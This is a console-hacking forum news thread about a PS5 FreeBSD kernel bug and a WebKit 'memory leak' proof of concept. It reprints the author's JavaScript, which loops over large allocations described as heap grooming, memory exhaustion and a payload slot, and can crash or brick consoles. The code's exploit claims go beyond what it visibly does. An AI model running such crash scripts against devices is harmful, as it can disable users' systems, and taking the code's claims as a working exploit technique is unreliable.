Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 / PS5 PKGs.
Category PS5 Jailbreaking       Thread starter Thread starter PSXHAX       Date / timeStart date Sep 10, 2024 at 5:30 PM       Replies 16      
Status
Not open for further replies.
Recently @zecoxao shared via X Post a FreeBSD Kernel Bug Security Advisory while confirming the PlayStation 5 vulnerability works alongside a WebKit Memory Leak Proof-of-Concept (PoC) test page for all WebKit browsers (PS4 / PS5 including Safari) by Debv on Github aka idebty on X (DebTy's Ko-fi Page :coffee:)... which Kameleonre_ on X notes has since been fixed (CVE-2024-43102). 🧐

From the Github repository's README.md: Memory Leak

Author: idebty
I'm self taught I don't know any one in the community if you want to use this use it but credit me.

WebKit Memory Leak PoC

Description


This Proof of Concept (PoC) demonstrates a WebKit memory exhaustion exploit that I have been working on. The current iteration works but still needs to be fully exploited. Below is the JavaScript code that shows how it operates, along with explanations of each step.

How it Works

The code below follows five key steps:
  1. Heap Initialization: Allocates memory in a controlled manner.
  2. Heap Grooming: Manipulates memory to create gaps for the exploit.
  3. Memory Exhaustion: Continuously allocates and clears memory to exhaust resources.
  4. Payload Execution: Executes the payload to perform memory corruption.
  5. Exploit Execution: Runs the steps in sequence to trigger the memory exhaustion.
Code:
// Step 1: Initialize Controlled Memory
function initializeHeap() {
    //alert("Int heap");
    let buffers = [];
    for (let i = 0; i < 2048; i++) { // Reduced allocations
        buffers.push(new ArrayBuffer(500000)); // Smaller blocks of memory
    }
    return buffers;
}

// Step 2: Groom the Heap
function groomHeap() {
    //alert("groom heap");
    let tempArray = [];

    // Allocate and deallocate in patterns
    for (let i = 0; i < 2048; i++) { // Reduced iterations
        let buffer = new ArrayBuffer(1000); // Allocate smaller blocks
        tempArray.push(buffer);
    }

    // Deallocate some of the buffers to create holes in the heap
    for (let i = 0; i < 1512; i++) { // Fewer deallocations
        tempArray[i] = null; // Free up space to create holes in the heap
    }

    return tempArray;
}

// Step 3: Memory Exhaustion Function
function memExh() {
    let bufferArray = [];
    for (let i = 0; i < 2048; i++) { // Reduced iterations
        bufferArray.push(new ArrayBuffer(900000)); // Allocate smaller buffers
        if (bufferArray.length > 512) { // Less aggressive clearing
            bufferArray = []; // Clear buffer array to exhaust memory
        }
    }
}

// Step 4: The Exploit Payload Function
function payload() {
    let largeString = "B".repeat(900000); // Smaller initial string
    let obj = {};
    let iterationCount = 0; // Counter to track number of iterations

    while (true) {
        // String concatenation
        largeString += largeString;
        if (largeString.length > 100000000) { // Lower threshold for reset
            largeString = "B".repeat(900000); // Reset string to avoid overflow
        }
        memExh();
        iterationCount++;
        if (iterationCount > 64) break; // Control the number of iterations
    }
}

// Step 5: Perform the Exploit
function performExploit() {
    let controlledBuffers = initializeHeap(); // Initialize the heap
    let groomedHeap = groomHeap(); // Groom the heap
 
    // Start memory corruption
    memExh();

    // Run the payload
    payload();
}

performExploit();

## Instructions
  1. Copy the above code and run it in a Exploitable PS5 (Works Until guess 9.60?) this might not be useful in ps4
  2. Be mindful that this is a PoC and should be used for educational purposes only.
  3. Further testing is required to fully understand this vulnerability.
  4. Place Your Payload in the payload function
Disclaimer

This PoC is for educational purposes only. The author is not responsible for any misuse of this code.

⚠️ IM NOT LIABLE TO ANY DAMAGES CAUSED BY THIS POC OR ANY OTHER USE OF IT THIS CAN BRICK AND MIGHT BRICK YOUR SYSTEM IF LEFT UNEDITED ⚠️

A Message to Sony

Sony I have reported this and got dismissed and I have provided enough proof plus with that unreleased PoC it's not my fault that even after 6months you didn't fix it I have gave you more then enough to fix this is to hopefully encourage you to fix it

Heap Memory Exploit Code
Code:
function memmexh() {
 
        // Simulate allocation of an object
        let obj = { data: "important data" };

        // Reference to the object
        let ref = obj;

        // Simulate freeing the object
        obj = null;

 
 
    }
function ComplexOverflow() {
    let largeString = "A".repeat(1000000); // 1 million A's
    let bufferArray = [];
    let nestedArray = [];
    let obj = {};
    let counter = 0;
    let counterr = 0;

    while (true) {

 
        // String concatenation
        largeString += largeString;
        if (largeString.length > 100000000) {
            largeString = "A".repeat(1000000);
        }

        // Array buffer allocation
        bufferArray.push(new ArrayBuffer(1000000));
        if (bufferArray.length > 1000) {
            bufferArray = [];
        }

        // Nested arrays
        nestedArray.push([]);
        if (nestedArray.length > 1000) {
            nestedArray = [];
        }

 
        counterr++;
        if (counterr >= 100) {
            location.reload();
        }
        // Object property expansion
        obj[counter] = "A".repeat(1000);
        counter++;
        if (counter > 10000000) {
            obj = {};
            counter = 0;
        }
    }
}










let MTestClassesArray = [];

class MTestClass {
    constructor() {}
}

const create_1000_objects = () => {
    let counter = 0;
    memmexh()
    while (true) {
        // Simulate allocation of an object
        let obj = { data: "important data" };

        // Reference to the object
        let ref = obj;


        counter++;
        if (counter >= 500) {
            location.reload();
        }
        for (let i = 0; i < 1000; i++) {
            MTestClassesArray.push(new MTestClass());
        }
        const text = `Total ${MTestClassesArray.length} MTestClass objects created`;
        document.getElementById('divMsg').innerHTML = text;
    }
}

Kameleonre_ on X notes, "Ok the bugged code it's not on FreeBSD 9.0 which means not valid for PS4.. but it's on PS5.. thx to SiSTR0 and iMrDJAi for pointing it... this is the C code on FreeBSD 9.0. Bug not there..." further stating, "But it's on FreeBSD 11 branch [PS5] this is the line which contains the bug."

According to notnotzecoxao on X, "also my friend said this should work on 1.xx and 2.xx as well as up until some of the most recent fws," while @CrazyVoid asks in an X post, "why does he not release his impl of the kernel bug? instead of making people recreate the work over again" as CrazyVoidPS4 then admits, "to be fair, specter enjoys working on things like that I think."

Shortly afterwards, idebty stated, "Someone modified my code idk what he did but he just made it trigger an error everytime it's a system error at that it seems like he's trying to make it copy a payload.bin. This might be a first for Sony an exploit that releases for the latest firmware" with @SeregonWar on Github responding in an X post, "Hi! I am the creator of the fork! I don't know if the changes I made will work, I am trying to exploit the vulnerability somehow, thanks for your work in finding the vulnerability!"

⬆️ Update: @zecoxao announced via X Post, "confirmed by @flatz that 8.00 patches this bug" going on to clarify, "the kernel bug, I might add" and then further elaborating, "to everyone that did not understand flatz's words: it's likely that sony never intended to fix this bug, and accidentally "fixed" it on 8.00 by patching syscall and libkernel access from the main contenders such as bluray java, webkit and ps2 games."

This PS5Scene news comes following the PS5 IPV6 Kernel Exploit v1.03, previous updates, PS4 v10.00-11.02 & PS5 v6.00-8.60 PoC Test, TheFlow0's Recent HackerOne Bug Report, PS4 / PS5 Semi-Permanent Exploits (WIP), PS5 Pro Tech Presentation by Mark Cerny and Sony's Official PS5 Pro Launch Date Announcement earlier on.

Spoiler: Related X Posts

PS5 Vulnerable to FreeBSD Kernel Bug, WebKit Memory Leak PoC by DebTy.png
 

Comments

This leaves a chance for the PS5 pro, of which we do not know the OFW version once it is taken out of its box. 9.60 maybe with luck
 
Status
Not open for further replies.
Back
Top